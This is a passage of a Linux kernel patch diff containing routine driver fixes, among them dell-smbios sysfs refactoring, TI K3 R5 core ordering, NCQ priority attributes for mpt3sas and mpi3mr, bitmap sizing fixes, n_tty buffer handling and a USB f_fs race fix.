+ }
+ 
+ static struct attribute_group smbios_attribute_group = {
+@@ -473,22 +458,15 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ {
+ 	char *location_name;
+ 	char *value_name;
+-	size_t size;
+ 	int ret;
+ 	int i, j;
+ 
+-	/* (number of tokens  + 1 for null terminated */
+-	size = sizeof(struct device_attribute) * (da_num_tokens + 1);
+-	token_location_attrs = kzalloc(size, GFP_KERNEL);
+-	if (!token_location_attrs)
++	token_entries = kcalloc(da_num_tokens, sizeof(*token_entries), GFP_KERNEL);
++	if (!token_entries)
+ 		return -ENOMEM;
+-	token_value_attrs = kzalloc(size, GFP_KERNEL);
+-	if (!token_value_attrs)
+-		goto out_allocate_value;
+ 
+ 	/* need to store both location and value + terminator*/
+-	size = sizeof(struct attribute *) * ((2 * da_num_tokens) + 1);
+-	token_attrs = kzalloc(size, GFP_KERNEL);
++	token_attrs = kcalloc((2 * da_num_tokens) + 1, sizeof(*token_attrs), GFP_KERNEL);
+ 	if (!token_attrs)
+ 		goto out_allocate_attrs;
+ 
+@@ -496,27 +474,32 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ 		/* skip empty */
+ 		if (da_tokens[i].tokenID == 0)
+ 			continue;
++
++		token_entries[i].token = &da_tokens[i];
++
+ 		/* add location */
+ 		location_name = kasprintf(GFP_KERNEL, "%04x_location",
+ 					  da_tokens[i].tokenID);
+ 		if (location_name == NULL)
+ 			goto out_unwind_strings;
+-		sysfs_attr_init(&token_location_attrs[i].attr);
+-		token_location_attrs[i].attr.name = location_name;
+-		token_location_attrs[i].attr.mode = 0444;
+-		token_location_attrs[i].show = location_show;
+-		token_attrs[j++] = &token_location_attrs[i].attr;
++
++		sysfs_attr_init(&token_entries[i].location_attr.attr);
++		token_entries[i].location_attr.attr.name = location_name;
++		token_entries[i].location_attr.attr.mode = 0444;
++		token_entries[i].location_attr.show = location_show;
++		token_attrs[j++] = &token_entries[i].location_attr.attr;
+ 
+ 		/* add value */
+ 		value_name = kasprintf(GFP_KERNEL, "%04x_value",
+ 				       da_tokens[i].tokenID);
+ 		if (value_name == NULL)
+ 			goto loop_fail_create_value;
+-		sysfs_attr_init(&token_value_attrs[i].attr);
+-		token_value_attrs[i].attr.name = value_name;
+-		token_value_attrs[i].attr.mode = 0444;
+-		token_value_attrs[i].show = value_show;
+-		token_attrs[j++] = &token_value_attrs[i].attr;
++
++		sysfs_attr_init(&token_entries[i].value_attr.attr);
++		token_entries[i].value_attr.attr.name = value_name;
++		token_entries[i].value_attr.attr.mode = 0444;
++		token_entries[i].value_attr.show = value_show;
++		token_attrs[j++] = &token_entries[i].value_attr.attr;
+ 		continue;
+ 
+ loop_fail_create_value:
+@@ -532,14 +515,12 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ 
+ out_unwind_strings:
+ 	while (i--) {
+-		kfree(token_location_attrs[i].attr.name);
+-		kfree(token_value_attrs[i].attr.name);
++		kfree(token_entries[i].location_attr.attr.name);
++		kfree(token_entries[i].value_attr.attr.name);
+ 	}
+ 	kfree(token_attrs);
+ out_allocate_attrs:
+-	kfree(token_value_attrs);
+-out_allocate_value:
+-	kfree(token_location_attrs);
++	kfree(token_entries);
+ 
+ 	return -ENOMEM;
+ }
+@@ -551,12 +532,11 @@ static void free_group(struct platform_device *pdev)
+ 	sysfs_remove_group(&pdev->dev.kobj,
+ 				&smbios_attribute_group);
+ 	for (i = 0; i < da_num_tokens; i++) {
+-		kfree(token_location_attrs[i].attr.name);
+-		kfree(token_value_attrs[i].attr.name);
++		kfree(token_entries[i].location_attr.attr.name);
++		kfree(token_entries[i].value_attr.attr.name);
+ 	}
+ 	kfree(token_attrs);
+-	kfree(token_value_attrs);
+-	kfree(token_location_attrs);
++	kfree(token_entries);
+ }
+ 
+ static int __init dell_smbios_init(void)
+diff --git a/drivers/ptp/ptp_chardev.c b/drivers/ptp/ptp_chardev.c
+index 9311f3d09c8fc..8eb902fe73a98 100644
+--- a/drivers/ptp/ptp_chardev.c
++++ b/drivers/ptp/ptp_chardev.c
+@@ -84,7 +84,8 @@ int ptp_set_pinfunc(struct ptp_clock *ptp, unsigned int pin,
+ 	}
+ 
+ 	if (info->verify(info, pin, func, chan)) {
+-		pr_err("driver cannot use function %u on pin %u\n", func, chan);
++		pr_err("driver cannot use function %u and channel %u on pin %u\n",
++		       func, chan, pin);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+diff --git a/drivers/remoteproc/ti_k3_r5_remoteproc.c b/drivers/remoteproc/ti_k3_r5_remoteproc.c
+index 0481926c69752..4919407d422da 100644
+--- a/drivers/remoteproc/ti_k3_r5_remoteproc.c
++++ b/drivers/remoteproc/ti_k3_r5_remoteproc.c
+@@ -98,12 +98,14 @@ struct k3_r5_soc_data {
+  * @dev: cached device pointer
+  * @mode: Mode to configure the Cluster - Split or LockStep
+  * @cores: list of R5 cores within the cluster
++ * @core_transition: wait queue to sync core state changes
+  * @soc_data: SoC-specific feature data for a R5FSS
+  */
+ struct k3_r5_cluster {
+ 	struct device *dev;
+ 	enum cluster_mode mode;
+ 	struct list_head cores;
++	wait_queue_head_t core_transition;
+ 	const struct k3_r5_soc_data *soc_data;
+ };
+ 
+@@ -123,6 +125,7 @@ struct k3_r5_cluster {
+  * @atcm_enable: flag to control ATCM enablement
+  * @btcm_enable: flag to control BTCM enablement
+  * @loczrama: flag to dictate which TCM is at device address 0x0
++ * @released_from_reset: flag to signal when core is out of reset
+  */
+ struct k3_r5_core {
+ 	struct list_head elem;
+@@ -139,6 +142,7 @@ struct k3_r5_core {
+ 	u32 atcm_enable;
+ 	u32 btcm_enable;
+ 	u32 loczrama;
++	bool released_from_reset;
+ };
+ 
+ /**
+@@ -455,6 +459,8 @@ static int k3_r5_rproc_prepare(struct rproc *rproc)
+ 			ret);
+ 		return ret;
+ 	}
++	core->released_from_reset = true;
++	wake_up_interruptible(&cluster->core_transition);
+ 
+ 	/*
+ 	 * Newer IP revisions like on J7200 SoCs support h/w auto-initialization
+@@ -537,7 +543,7 @@ static int k3_r5_rproc_start(struct rproc *rproc)
+ 	struct k3_r5_rproc *kproc = rproc->priv;
+ 	struct k3_r5_cluster *cluster = kproc->cluster;
+ 	struct device *dev = kproc->dev;
+-	struct k3_r5_core *core;
++	struct k3_r5_core *core0, *core;
+ 	u32 boot_addr;
+ 	int ret;
+ 
+@@ -563,6 +569,16 @@ static int k3_r5_rproc_start(struct rproc *rproc)
+ 				goto unroll_core_run;
+ 		}
+ 	} else {
++		/* do not allow core 1 to start before core 0 */
++		core0 = list_first_entry(&cluster->cores, struct k3_r5_core,
++					 elem);
++		if (core != core0 && core0->rproc->state == RPROC_OFFLINE) {
++			dev_err(dev, "%s: can not start core 1 before core 0\n",
++				__func__);
++			ret = -EPERM;
++			goto put_mbox;
++		}
++
+ 		ret = k3_r5_core_run(core);
+ 		if (ret)
+ 			goto put_mbox;
+@@ -608,7 +624,8 @@ static int k3_r5_rproc_stop(struct rproc *rproc)
+ {
+ 	struct k3_r5_rproc *kproc = rproc->priv;
+ 	struct k3_r5_cluster *cluster = kproc->cluster;
+-	struct k3_r5_core *core = kproc->core;
++	struct device *dev = kproc->dev;
++	struct k3_r5_core *core1, *core = kproc->core;
+ 	int ret;
+ 
+ 	/* halt all applicable cores */
+@@ -621,6 +638,16 @@ static int k3_r5_rproc_stop(struct rproc *rproc)
+ 			}
+ 		}
+ 	} else {
++		/* do not allow core 0 to stop before core 1 */
++		core1 = list_last_entry(&cluster->cores, struct k3_r5_core,
++					elem);
++		if (core != core1 && core1->rproc->state != RPROC_OFFLINE) {
++			dev_err(dev, "%s: can not stop core 0 before core 1\n",
++				__func__);
++			ret = -EPERM;
++			goto out;
++		}
++
+ 		ret = k3_r5_core_halt(core);
+ 		if (ret)
+ 			goto out;
+@@ -1137,6 +1164,12 @@ static int k3_r5_rproc_configure_mode(struct k3_r5_rproc *kproc)
+ 		return ret;
+ 	}
+ 
++	/*
++	 * Skip the waiting mechanism for sequential power-on of cores if the
++	 * core has already been booted by another entity.
++	 */
++	core->released_from_reset = c_state;
++
+ 	ret = ti_sci_proc_get_status(core->tsp, &boot_vec, &cfg, &ctrl,
+ 				     &stat);
+ 	if (ret < 0) {
+@@ -1273,6 +1306,26 @@ static int k3_r5_cluster_rproc_init(struct platform_device *pdev)
+ 		if (cluster->mode == CLUSTER_MODE_LOCKSTEP ||
+ 		    cluster->mode == CLUSTER_MODE_SINGLECPU)
+ 			break;
++
++		/*
++		 * R5 cores require to be powered on sequentially, core0
++		 * should be in higher power state than core1 in a cluster
++		 * So, wait for current core to power up before proceeding
++		 * to next core and put timeout of 2sec for each core.
++		 *
++		 * This waiting mechanism is necessary because
++		 * rproc_auto_boot_callback() for core1 can be called before
++		 * core0 due to thread execution order.
++		 */
++		ret = wait_event_interruptible_timeout(cluster->core_transition,
++						       core->released_from_reset,
++						       msecs_to_jiffies(2000));
++		if (ret <= 0) {
++			dev_err(dev,
++				"Timed out waiting for %s core to power up!\n",
++				rproc->name);
++			return ret;
++		}
+ 	}
+ 
+ 	return 0;
+@@ -1708,6 +1761,7 @@ static int k3_r5_probe(struct platform_device *pdev)
+ 				CLUSTER_MODE_SPLIT : CLUSTER_MODE_LOCKSTEP;
+ 	cluster->soc_data = data;
+ 	INIT_LIST_HEAD(&cluster->cores);
++	init_waitqueue_head(&cluster->core_transition);
+ 
+ 	ret = of_property_read_u32(np, "ti,cluster-mode", &cluster->mode);
+ 	if (ret < 0 && ret != -EINVAL) {
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 42600e5c457a1..c77803bd9b009 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -1851,10 +1851,72 @@ persistent_id_show(struct device *dev, struct device_attribute *attr,
+ }
+ static DEVICE_ATTR_RO(persistent_id);
+ 
++/**
++ * sas_ncq_prio_supported_show - Indicate if device supports NCQ priority
++ * @dev: pointer to embedded device
++ * @attr: sas_ncq_prio_supported attribute descriptor
++ * @buf: the buffer returned
++ *
++ * A sysfs 'read-only' sdev attribute, only works with SATA devices
++ */
++static ssize_t
++sas_ncq_prio_supported_show(struct device *dev,
++			    struct device_attribute *attr, char *buf)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++
++	return sysfs_emit(buf, "%d\n", sas_ata_ncq_prio_supported(sdev));
++}
++static DEVICE_ATTR_RO(sas_ncq_prio_supported);
++
++/**
++ * sas_ncq_prio_enable_show - send prioritized io commands to device
++ * @dev: pointer to embedded device
++ * @attr: sas_ncq_prio_enable attribute descriptor
++ * @buf: the buffer returned
++ *
++ * A sysfs 'read/write' sdev attribute, only works with SATA devices
++ */
++static ssize_t
++sas_ncq_prio_enable_show(struct device *dev,
++				 struct device_attribute *attr, char *buf)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++	struct mpi3mr_sdev_priv_data *sdev_priv_data =  sdev->hostdata;
++
++	if (!sdev_priv_data)
++		return 0;
++
++	return sysfs_emit(buf, "%d\n", sdev_priv_data->ncq_prio_enable);
++}
++
++static ssize_t
++sas_ncq_prio_enable_store(struct device *dev,
++				  struct device_attribute *attr,
++				  const char *buf, size_t count)
++{
++	struct scsi_device *sdev = to_scsi_device(dev);
++	struct mpi3mr_sdev_priv_data *sdev_priv_data =  sdev->hostdata;
++	bool ncq_prio_enable = 0;
++
++	if (kstrtobool(buf, &ncq_prio_enable))
++		return -EINVAL;
++
++	if (!sas_ata_ncq_prio_supported(sdev))
++		return -EINVAL;
++
++	sdev_priv_data->ncq_prio_enable = ncq_prio_enable;
++
++	return strlen(buf);
++}
++static DEVICE_ATTR_RW(sas_ncq_prio_enable);
++
+ static struct attribute *mpi3mr_dev_attrs[] = {
+ 	&dev_attr_sas_address.attr,
+ 	&dev_attr_device_handle.attr,
+ 	&dev_attr_persistent_id.attr,
++	&dev_attr_sas_ncq_prio_supported.attr,
++	&dev_attr_sas_ncq_prio_enable.attr,
+ 	NULL,
+ };
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 8e6ac08e553bb..421a03dbbeb73 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -8497,6 +8497,12 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->pd_handles_sz = (ioc->facts.MaxDevHandle / 8);
+ 	if (ioc->facts.MaxDevHandle % 8)
+ 		ioc->pd_handles_sz++;
++	/*
++	 * pd_handles_sz should have, at least, the minimal room for
++	 * set_bit()/test_bit(), otherwise out-of-memory touch may occur.
++	 */
++	ioc->pd_handles_sz = ALIGN(ioc->pd_handles_sz, sizeof(unsigned long));
++
+ 	ioc->pd_handles = kzalloc(ioc->pd_handles_sz,
+ 	    GFP_KERNEL);
+ 	if (!ioc->pd_handles) {
+@@ -8514,6 +8520,13 @@ mpt3sas_base_attach(struct MPT3SAS_ADAPTER *ioc)
+ 	ioc->pend_os_device_add_sz = (ioc->facts.MaxDevHandle / 8);
+ 	if (ioc->facts.MaxDevHandle % 8)
+ 		ioc->pend_os_device_add_sz++;
++
++	/*
++	 * pend_os_device_add_sz should have, at least, the minimal room for
++	 * set_bit()/test_bit(), otherwise out-of-memory may occur.
++	 */
++	ioc->pend_os_device_add_sz = ALIGN(ioc->pend_os_device_add_sz,
++					   sizeof(unsigned long));
+ 	ioc->pend_os_device_add = kzalloc(ioc->pend_os_device_add_sz,
+ 	    GFP_KERNEL);
+ 	if (!ioc->pend_os_device_add) {
+@@ -8805,6 +8818,12 @@ _base_check_ioc_facts_changes(struct MPT3SAS_ADAPTER *ioc)
+ 		if (ioc->facts.MaxDevHandle % 8)
+ 			pd_handles_sz++;
+ 
++		/*
++		 * pd_handles should have, at least, the minimal room for
++		 * set_bit()/test_bit(), otherwise out-of-memory touch may
++		 * occur.
++		 */
++		pd_handles_sz = ALIGN(pd_handles_sz, sizeof(unsigned long));
+ 		pd_handles = krealloc(ioc->pd_handles, pd_handles_sz,
+ 		    GFP_KERNEL);
+ 		if (!pd_handles) {
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
+index 10055c7e4a9f7..eb00c091e29e0 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
+@@ -2045,9 +2045,6 @@ void
+ mpt3sas_setup_direct_io(struct MPT3SAS_ADAPTER *ioc, struct scsi_cmnd *scmd,
+ 	struct _raid_device *raid_device, Mpi25SCSIIORequest_t *mpi_request);
+ 
+-/* NCQ Prio Handling Check */
+-bool scsih_ncq_prio_supp(struct scsi_device *sdev);
+-
+ void mpt3sas_setup_debugfs(struct MPT3SAS_ADAPTER *ioc);
+ void mpt3sas_destroy_debugfs(struct MPT3SAS_ADAPTER *ioc);
+ void mpt3sas_init_debugfs(void);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_ctl.c b/drivers/scsi/mpt3sas/mpt3sas_ctl.c
+index 0d8b1e942deda..fc5af6a5114e3 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_ctl.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_ctl.c
+@@ -4034,7 +4034,7 @@ sas_ncq_prio_supported_show(struct device *dev,
+ {
+ 	struct scsi_device *sdev = to_scsi_device(dev);
+ 
+-	return sysfs_emit(buf, "%d\n", scsih_ncq_prio_supp(sdev));
++	return sysfs_emit(buf, "%d\n", sas_ata_ncq_prio_supported(sdev));
+ }
+ static DEVICE_ATTR_RO(sas_ncq_prio_supported);
+ 
+@@ -4069,7 +4069,7 @@ sas_ncq_prio_enable_store(struct device *dev,
+ 	if (kstrtobool(buf, &ncq_prio_enable))
+ 		return -EINVAL;
+ 
+-	if (!scsih_ncq_prio_supp(sdev))
++	if (!sas_ata_ncq_prio_supported(sdev))
+ 		return -EINVAL;
+ 
+ 	sas_device_priv_data->ncq_prio_enable = ncq_prio_enable;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+index 2ea3bdc638177..31768da482a57 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+@@ -12591,29 +12591,6 @@ scsih_pci_mmio_enabled(struct pci_dev *pdev)
+ 	return PCI_ERS_RESULT_RECOVERED;
+ }
+ 
+-/**
+- * scsih_ncq_prio_supp - Check for NCQ command priority support
+- * @sdev: scsi device struct
+- *
+- * This is called when a user indicates they would like to enable
+- * ncq command priorities. This works only on SATA devices.
+- */
+-bool scsih_ncq_prio_supp(struct scsi_device *sdev)
+-{
+-	struct scsi_vpd *vpd;
+-	bool ncq_prio_supp = false;
+-
+-	rcu_read_lock();
+-	vpd = rcu_dereference(sdev->vpd_pg89);
+-	if (!vpd || vpd->len < 214)
+-		goto out;
+-
+-	ncq_prio_supp = (vpd->data[213] >> 4) & 1;
+-out:
+-	rcu_read_unlock();
+-
+-	return ncq_prio_supp;
+-}
+ /*
+  * The pci device ids are defined in mpi/mpi2_cnfg.h.
+  */
+diff --git a/drivers/scsi/scsi_transport_sas.c b/drivers/scsi/scsi_transport_sas.c
+index 74b99f2b0b74a..6941d8cfb9ba5 100644
+--- a/drivers/scsi/scsi_transport_sas.c
++++ b/drivers/scsi/scsi_transport_sas.c
+@@ -416,6 +416,29 @@ unsigned int sas_is_tlr_enabled(struct scsi_device *sdev)
+ }
+ EXPORT_SYMBOL_GPL(sas_is_tlr_enabled);
+ 
++/**
++ * sas_ata_ncq_prio_supported - Check for ATA NCQ command priority support
++ * @sdev: SCSI device
++ *
++ * Check if an ATA device supports NCQ priority using VPD page 89h (ATA
++ * Information). Since this VPD page is implemented only for ATA devices,
++ * this function always returns false for SCSI devices.
++ */
++bool sas_ata_ncq_prio_supported(struct scsi_device *sdev)
++{
++	struct scsi_vpd *vpd;
++	bool ncq_prio_supported = false;
++
++	rcu_read_lock();
++	vpd = rcu_dereference(sdev->vpd_pg89);
++	if (vpd && vpd->len >= 214)
++		ncq_prio_supported = (vpd->data[213] >> 4) & 1;
++	rcu_read_unlock();
++
++	return ncq_prio_supported;
++}
++EXPORT_SYMBOL_GPL(sas_ata_ncq_prio_supported);
++
+ /*
+  * SAS Phy attributes
+  */
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 3ec9b324fdcf9..10df4ee01b3f2 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3288,16 +3288,23 @@ static bool sd_validate_opt_xfer_size(struct scsi_disk *sdkp,
+ 
+ static void sd_read_block_zero(struct scsi_disk *sdkp)
+ {
+-	unsigned int buf_len = sdkp->device->sector_size;
+-	char *buffer, cmd[10] = { };
++	struct scsi_device *sdev = sdkp->device;
++	unsigned int buf_len = sdev->sector_size;
++	u8 *buffer, cmd[16] = { };
+ 
+ 	buffer = kmalloc(buf_len, GFP_KERNEL);
+ 	if (!buffer)
+ 		return;
+ 
+-	cmd[0] = READ_10;
+-	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
+-	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++	if (sdev->use_16_for_rw) {
++		cmd[0] = READ_16;
++		put_unaligned_be64(0, &cmd[2]); /* Logical block address 0 */
++		put_unaligned_be32(1, &cmd[10]);/* Transfer 1 logical block */
++	} else {
++		cmd[0] = READ_10;
++		put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
++		put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++	}
+ 
+ 	scsi_execute_req(sdkp->device, cmd, DMA_FROM_DEVICE, buffer, buf_len,
+ 			 NULL, SD_TIMEOUT, sdkp->max_retries, NULL);
+diff --git a/drivers/spmi/hisi-spmi-controller.c b/drivers/spmi/hisi-spmi-controller.c
+index 5bd23262abd61..6f065159f3de3 100644
+--- a/drivers/spmi/hisi-spmi-controller.c
++++ b/drivers/spmi/hisi-spmi-controller.c
+@@ -303,7 +303,6 @@ static int spmi_controller_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&spmi_controller->lock);
+ 
+-	ctrl->nr = spmi_controller->channel;
+ 	ctrl->dev.parent = pdev->dev.parent;
+ 	ctrl->dev.of_node = of_node_get(pdev->dev.of_node);
+ 
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index f691bce5c1477..cbaaa9f776e52 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -927,8 +927,9 @@ static void margining_port_init(struct tb_port *port)
+ 	debugfs_create_file("run", 0600, dir, port, &margining_run_fops);
+ 	debugfs_create_file("results", 0600, dir, port, &margining_results_fops);
+ 	debugfs_create_file("test", 0600, dir, port, &margining_test_fops);
+-	if (independent_voltage_margins(usb4) ||
+-	    (supports_time(usb4) && independent_time_margins(usb4)))
++	if (independent_voltage_margins(usb4) == USB4_MARGIN_CAP_0_VOLTAGE_HL ||
++	    (supports_time(usb4) &&
++	     independent_time_margins(usb4) == USB4_MARGIN_CAP_1_TIME_LR))
+ 		debugfs_create_file("margin", 0600, dir, port, &margining_margin_fops);
+ }
+ 
+diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
+index 4dff2f34e2d06..3600cac105fa8 100644
+--- a/drivers/tty/n_tty.c
++++ b/drivers/tty/n_tty.c
+@@ -1602,15 +1602,25 @@ static void __receive_buf(struct tty_struct *tty, const unsigned char *cp,
+ 	else if (ldata->raw || (L_EXTPROC(tty) && !preops))
+ 		n_tty_receive_buf_raw(tty, cp, fp, count);
+ 	else if (tty->closing && !L_EXTPROC(tty)) {
+-		if (la_count > 0)
++		if (la_count > 0) {
+ 			n_tty_receive_buf_closing(tty, cp, fp, la_count, true);
+-		if (count > la_count)
+-			n_tty_receive_buf_closing(tty, cp, fp, count - la_count, false);
++			cp += la_count;
++			if (fp)
++				fp += la_count;
++			count -= la_count;
++		}
++		if (count > 0)
++			n_tty_receive_buf_closing(tty, cp, fp, count, false);
+ 	} else {
+-		if (la_count > 0)
++		if (la_count > 0) {
+ 			n_tty_receive_buf_standard(tty, cp, fp, la_count, true);
+-		if (count > la_count)
+-			n_tty_receive_buf_standard(tty, cp, fp, count - la_count, false);
++			cp += la_count;
++			if (fp)
++				fp += la_count;
++			count -= la_count;
++		}
++		if (count > 0)
++			n_tty_receive_buf_standard(tty, cp, fp, count, false);
+ 
+ 		flush_echoes(tty);
+ 		if (tty->ops->flush_chars)
+diff --git a/drivers/tty/serial/8250/8250_dw.c b/drivers/tty/serial/8250/8250_dw.c
+index 88035100b86c6..a1f2259cc9a98 100644
+--- a/drivers/tty/serial/8250/8250_dw.c
++++ b/drivers/tty/serial/8250/8250_dw.c
+@@ -523,7 +523,10 @@ static int dw8250_probe(struct platform_device *pdev)
+ 	if (!regs)
+ 		return dev_err_probe(dev, -EINVAL, "no registers defined\n");
+ 
+-	irq = platform_get_irq(pdev, 0);
++	irq = platform_get_irq_optional(pdev, 0);
++	/* no interrupt -> fall back to polling */
++	if (irq == -ENXIO)
++		irq = 0;
+ 	if (irq < 0)
+ 		return irq;
+ 
+diff --git a/drivers/tty/serial/8250/8250_pxa.c b/drivers/tty/serial/8250/8250_pxa.c
+index 795e55142d4c7..70a56062f791b 100644
+--- a/drivers/tty/serial/8250/8250_pxa.c
++++ b/drivers/tty/serial/8250/8250_pxa.c
+@@ -124,6 +124,7 @@ static int serial_pxa_probe(struct platform_device *pdev)
+ 	uart.port.regshift = 2;
+ 	uart.port.irq = irq;
+ 	uart.port.fifosize = 64;
++	uart.tx_loadsz = 32;
+ 	uart.port.flags = UPF_IOREMAP | UPF_SKIP_TEST | UPF_FIXED_TYPE;
+ 	uart.port.dev = &pdev->dev;
+ 	uart.port.uartclk = clk_get_rate(data->clk);
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index e6eedebf67765..a723df9b37dd9 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -482,16 +482,28 @@ static bool sc16is7xx_regmap_noinc(struct device *dev, unsigned int reg)
+ 	return reg == SC16IS7XX_RHR_REG;
+ }
+ 
++/*
++ * Configure programmable baud rate generator (divisor) according to the
++ * desired baud rate.
++ *
++ * From the datasheet, the divisor is computed according to:
++ *
++ *              XTAL1 input frequency
++ *             -----------------------
++ *                    prescaler
++ * divisor = ---------------------------
++ *            baud-rate x sampling-rate
++ */
+ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ {
+ 	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+ 	u8 lcr;
+-	u8 prescaler = 0;
++	unsigned int prescaler = 1;
+ 	unsigned long clk = port->uartclk, div = clk / 16 / baud;
+ 
+-	if (div > 0xffff) {
+-		prescaler = SC16IS7XX_MCR_CLKSEL_BIT;
+-		div /= 4;
++	if (div >= BIT(16)) {
++		prescaler = 4;
++		div /= prescaler;
+ 	}
+ 
+ 	/* In an amazing feat of design, the Enhanced Features Register shares
+@@ -528,9 +540,10 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 
+ 	mutex_unlock(&one->efr_lock);
+ 
++	/* If bit MCR_CLKSEL is set, the divide by 4 prescaler is activated. */
+ 	sc16is7xx_port_update(port, SC16IS7XX_MCR_REG,
+ 			      SC16IS7XX_MCR_CLKSEL_BIT,
+-			      prescaler);
++			      prescaler == 1 ? 0 : SC16IS7XX_MCR_CLKSEL_BIT);
+ 
+ 	/* Open the LCR divisors for configuration */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG,
+@@ -545,7 +558,7 @@ static int sc16is7xx_set_baud(struct uart_port *port, int baud)
+ 	/* Put LCR back to the normal mode */
+ 	sc16is7xx_port_write(port, SC16IS7XX_LCR_REG, lcr);
+ 
+-	return DIV_ROUND_CLOSEST(clk / 16, div);
++	return DIV_ROUND_CLOSEST((clk / prescaler) / 16, div);
+ }
+ 
+ static void sc16is7xx_handle_rx(struct uart_port *port, unsigned int rxlen,
+diff --git a/drivers/usb/Makefile b/drivers/usb/Makefile
+index 643edf5fe18c6..80699e540caa9 100644
+--- a/drivers/usb/Makefile
++++ b/drivers/usb/Makefile
+@@ -34,6 +34,7 @@ obj-$(CONFIG_USB_R8A66597_HCD)	+= host/
+ obj-$(CONFIG_USB_FSL_USB2)	+= host/
+ obj-$(CONFIG_USB_FOTG210_HCD)	+= host/
+ obj-$(CONFIG_USB_MAX3421_HCD)	+= host/
++obj-$(CONFIG_USB_XEN_HCD)	+= host/
+ 
+ obj-$(CONFIG_USB_C67X00_HCD)	+= c67x00/
+ 
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index 1f0951be15ab7..eb0f5d7cc7563 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -266,14 +266,14 @@ static void wdm_int_callback(struct urb *urb)
+ 			dev_err(&desc->intf->dev, "Stall on int endpoint\n");
+ 			goto sw; /* halt is cleared in work */
+ 		default:
+-			dev_err(&desc->intf->dev,
++			dev_err_ratelimited(&desc->intf->dev,
+ 				"nonzero urb status received: %d\n", status);
+ 			break;
+ 		}
+ 	}
+ 
+ 	if (urb->actual_length < sizeof(struct usb_cdc_notification)) {
+-		dev_err(&desc->intf->dev, "wdm_int_callback - %d bytes\n",
++		dev_err_ratelimited(&desc->intf->dev, "wdm_int_callback - %d bytes\n",
+ 			urb->actual_length);
+ 		goto exit;
+ 	}
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index b2da74bb107af..698bf24ba44c7 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -830,9 +830,9 @@ static void ffs_user_copy_worker(struct work_struct *work)
+ {
+ 	struct ffs_io_data *io_data = container_of(work, struct ffs_io_data,
+ 						   work);
+-	int ret = io_data->req->status ? io_data->req->status :
+-					 io_data->req->actual;
++	int ret = io_data->status;
+ 	bool kiocb_has_eventfd = io_data->kiocb->ki_flags & IOCB_EVENTFD;
++	unsigned long flags;
+ 
+ 	if (io_data->read && ret > 0) {
+ 		kthread_use_mm(io_data->mm);
+@@ -845,7 +845,10 @@ static void ffs_user_copy_worker(struct work_struct *work)
+ 	if (io_data->ffs->ffs_eventfd && !kiocb_has_eventfd)
+ 		eventfd_signal(io_data->ffs->ffs_eventfd, 1);
+ 
++	spin_lock_irqsave(&io_data->ffs->eps_lock, flags);
+ 	usb_ep_free_request(io_data->ep, io_data->req);
++	io_data->req = NULL;
++	spin_unlock_irqrestore(&io_data->ffs->eps_lock, flags);
+ 
+ 	if (io_data->read)
+ 		kfree(io_data->to_free);
+@@ -861,6 +864,8 @@ static void ffs_epfile_async_io_complete(struct usb_ep *_ep,
+ 
+ 	ENTER();
+ 
++	io_data->status = req->status ? req->status : req->actual;
++
+ 	INIT_WORK(&io_data->work, ffs_user_copy_worker);
+ 	queue_work(ffs->io_completion_wq, &io_data->work);
+ }
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index e02ef31da68e4..f3a3a02ff820b 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -36,6 +36,7 @@
+ 
+ #define PCI_VENDOR_ID_ETRON		0x1b6f
